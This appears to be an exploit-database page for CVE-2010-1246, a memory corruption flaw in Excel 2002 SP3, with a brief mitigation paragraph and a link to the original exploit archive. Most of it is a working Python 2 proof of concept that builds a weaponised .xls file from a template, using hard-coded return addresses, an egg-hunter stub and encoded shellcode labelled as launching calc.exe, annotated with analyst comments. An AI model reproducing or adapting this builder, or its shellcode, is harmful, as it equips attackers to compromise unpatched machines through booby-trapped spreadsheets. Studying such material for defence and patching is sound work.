Excel RTD Memory Corruption - exploit.company
vendor:
Excel
by:
Unknown
9
CVSS
CRITICAL
Memory Corruption
119
CWE
Product Name: Excel
Affected Version From: Excel 2002 sp3
Affected Version To: Excel 2002 sp3
Patch Exists: YES
Related CVE: CVE-2010-1246
CPE: a:microsoft:excel:2002:sp3
Metasploit:
Other Scripts:
Platforms Tested:
2010

Excel RTD Memory Corruption

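This proof of concept targets a memory corruption vulnerability in Excel 2002 SP3 (CVE-2010-1246) using a crafted .xls file. The script below builds that file from a template workbook: it overwrites part of the file with hard-coded addresses that its author labels as pop pop ret and call esp instruction sequences, together with an egg-hunter stub, to execute the embedded shellcode (labelled in the script as launching calc.exe).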

Mitigation:

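Apply the Microsoft security update that addresses CVE-2010-1246 and keep Office fully patched. Excel 2002 (Office XP) no longer receives security updates, so systems still running it should be moved to a supported Office release. Until a system is patched, treat .xls files from untrusted sources as hostile: quarantine them at the mail gateway and open them only in an isolated environment.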
Source

Exploit-DB raw data:

'''
  __  __  ____         _    _ ____  
 |  \/  |/ __ \   /\  | |  | |  _ \ 
 | \  / | |  | | /  \ | |  | | |_) |
 | |\/| | |  | |/ /\ \| |  | |  _ < 
 | |  | | |__| / ____ \ |__| | |_) |
 |_|  |_|\____/_/    \_\____/|____/ 

http://www.exploit-db.com/moaub-10-excel-rtd-memory-corruption/
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/14966.zip (moaub-10-exploit.zip)
'''

'''
  Title             :  Excel RTD Memory Corruption 
  Version           :  Excel 2002 sp3
  Analysis          :  http://www.abysssec.com
  Vendor            :  http://www.microsoft.com
  Impact            :  Critical
  Contact           :  shahin [at] abysssec.com , info  [at] abysssec.com
  Twitter           :  @abysssec
  CVE               :  CVE-2010-1246
  MOAUB Number      :  MOAUB_10_BA
'''



import sys

def main():
    """Build 'exploit.xls' from the template workbook 'src.xls' (Python 2 only).

    Proof-of-concept file generator for the Excel 2002 SP3 RTD memory
    corruption issue identified in the file header as CVE-2010-1246.

    The template is read whole and cut at fixed byte offsets.  Two ranges
    are replaced and everything else is copied through unchanged:

      * bytes 4509..5012 (504 bytes) are replaced by 504 bytes of control
        data: padding, two hard-coded addresses, a NOP-padded stub and
        filler;
      * bytes 15000..15799 (800 bytes) are replaced by the payload, padded
        with NOPs to exactly 800 bytes.

    Because both replacements are same-size, the output has the same length
    as the template whenever the template is at least 15800 bytes long.
    NOTE(review): the offsets are only meaningful for the specific
    'src.xls' shipped with the original advisory; the script does not check
    the template's size or contents.

    Notes for analysts:
      * The stub loads the 4-byte tag 63 70 74 6E ("cptn") and the payload
        begins with that tag twice; the doubled tag is a fixed byte pattern
        in every file this script produces.
      * Both addresses are hard-coded constants, so the result is presumably
        tied to the module layout of the tested Excel build -- confirm
        against the advisory before relying on that.

    Side effects: reads 'src.xls' and writes 'exploit.xls' in the current
    directory; prints status lines; calls sys.exit(-1) on IOError.
    Returns None.
    """
   
    try:
		# Opened read/write ('rb+') although the template is only read here.
		fdR = open('src.xls', 'rb+')
		strTotal = fdR.read()
		# Template kept verbatim: head, middle and tail around the two
		# replaced ranges.
		str1 = strTotal[:4509]
		str2 = strTotal[5013:15000]
		str3 = strTotal[15800:]
		
		# Little-endian 32-bit addresses; the labels on the right are the
		# original author's description of what lives at each address.
		eip = "\xAd\x57\x00\x30"    # pop pop ret
		jmp = "\xF7\xC2\x03\x30"    # call esp
		
		# Egg-hunter stub: three NOPs followed by the search routine.  It
		# contains B8 63 70 74 6E, i.e. the tag "cptn" that the payload
		# below starts with.
		eggHunter = ""
		eggHunter += "\x90\x90\x90"
		eggHunter += "\x66\x81\xCA\xFF\x0F\x42\x52\x6A\x02\x58\xCD\x2E\x8A\xD8\x80\xFB\x05\x5A\x74\xEC\xB8\x63"
		eggHunter += "\x70\x74\x6e\x8B\xFA\xAF\x75\xE7\xAF\x75\xE4\xFF\xE7"		
		
		# Payload, labelled by the author as launching calc.exe.  The first
		# eight bytes are the "cptn" tag repeated twice.
		shellcode = '\x63\x70\x74\x6e\x63\x70\x74\x6e\x90\x90\x90\x89\xE5\xD9\xEE\xD9\x75\xF4\x5E\x56\x59\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x43\x43\x43\x43\x43\x43\x37\x51\x5A\x6A\x41\x58\x50\x30\x41\x30\x41\x6B\x41\x41\x51\x32\x41\x42\x32\x42\x42\x30\x42\x42\x41\x42\x58\x50\x38\x41\x42\x75\x4A\x49\x4B\x4C\x4B\x58\x51\x54\x43\x30\x43\x30\x45\x50\x4C\x4B\x51\x55\x47\x4C\x4C\x4B\x43\x4C\x43\x35\x44\x38\x45\x51\x4A\x4F\x4C\x4B\x50\x4F\x44\x58\x4C\x4B\x51\x4F\x47\x50\x45\x51\x4A\x4B\x51\x59\x4C\x4B\x46\x54\x4C\x4B\x43\x31\x4A\x4E\x46\x51\x49\x50\x4A\x39\x4E\x4C\x4C\x44\x49\x50\x42\x54\x45\x57\x49\x51\x48\x4A\x44\x4D\x45\x51\x49\x52\x4A\x4B\x4B\x44\x47\x4B\x46\x34\x46\x44\x45\x54\x43\x45\x4A\x45\x4C\x4B\x51\x4F\x47\x54\x43\x31\x4A\x4B\x43\x56\x4C\x4B\x44\x4C\x50\x4B\x4C\x4B\x51\x4F\x45\x4C\x45\x51\x4A\x4B\x4C\x4B\x45\x4C\x4C\x4B\x43\x31\x4A\x4B\x4C\x49\x51\x4C\x47\x54\x45\x54\x48\x43\x51\x4F\x46\x51\x4C\x36\x43\x50\x46\x36\x45\x34\x4C\x4B\x50\x46\x50\x30\x4C\x4B\x47\x30\x44\x4C\x4C\x4B\x44\x30\x45\x4C\x4E\x4D\x4C\x4B\x42\x48\x44\x48\x4D\x59\x4B\x48\x4B\x33\x49\x50\x43\x5A\x46\x30\x45\x38\x4C\x30\x4C\x4A\x45\x54\x51\x4F\x42\x48\x4D\x48\x4B\x4E\x4D\x5A\x44\x4E\x50\x57\x4B\x4F\x4A\x47\x43\x53\x47\x4A\x51\x4C\x50\x57\x51\x59\x50\x4E\x50\x44\x50\x4F\x46\x37\x50\x53\x51\x4C\x43\x43\x42\x59\x44\x33\x43\x44\x43\x55\x42\x4D\x50\x33\x50\x32\x51\x4C\x42\x43\x45\x31\x42\x4C\x42\x43\x46\x4E\x45\x35\x44\x38\x42\x45\x43\x30\x41\x41'
		
		# The stub must fit the 266-byte slot; shorter stubs are padded with
		# NOPs so the control block stays exactly 504 bytes.
		# NOTE(review): the message below says "Shellcode" but this check is
		# on the egg hunter; the early return also leaves fdR unclosed.
		if len(eggHunter) > 266:
			print "[*] Error : Shellcode length is long"
			return
		if len(eggHunter) <=266:
			dif =266 - len(eggHunter)
			while dif > 0 :
				eggHunter += '\x90'
				dif = dif - 1
				
				
		# Same fixed-slot rule for the payload: at most 800 bytes, NOP-padded
		# to exactly 800 so the template tail stays at its original offset.
		# NOTE(review): this early return also leaves fdR unclosed.
		if len(shellcode) > 800:
			print "[*] Error : Shellcode length is long"
			return
		if len(shellcode) <= 800:
			dif = 800 - len(shellcode)
			while dif > 0 :
				shellcode += '\x90'
				dif = dif - 1
				
		# Output is assembled strictly in file order; the sequence of writes
		# below IS the file layout, so it must not be reordered.
		fdW= open('exploit.xls', 'wb+')
		fdW.write(str1)
		fdW.write("\x41\x41\x41")    # padding
		fdW.write(jmp)
		fdW.write(eggHunter)				
		# EB 06 encodes a short jump forward by 6 bytes; 41 41 is padding.
		fdW.write("\xeb\x06\x41\x41")   
		fdW.write(eip)
		# 81 C4 24 16 00 00 encodes add esp, 0x1624 (the original comment
		# gave the constant as 2016).
		fdW.write("\x81\xc4\x24\x16\x00\x00")  # add esp, 0x1624
		fdW.write("\xc3")  #ret
		
		# 54 * 4 = 216 filler bytes bring the control block to 504 bytes,
		# the size of the template range it replaces.
		i = 0 
		while i < 54 :
			fdW.write("\x41\x41\x41\x41")    # padding
			i = i + 1
			
		fdW.write(str2)
		fdW.write(shellcode)
		fdW.write(str3)
		
		fdW.close()
		fdR.close()
		print '[-] Excel file generated'
    except IOError:
        # Covers a missing/unreadable template and a failed write alike;
        # the process exits with status -1.
        print '[*] Error : An IO error has occurred'
        print '[-] Exiting ...'
        sys.exit(-1)
                
# Run the generator only when executed as a script, so importing this module
# for analysis never touches the filesystem.
if __name__ == "__main__":
    main()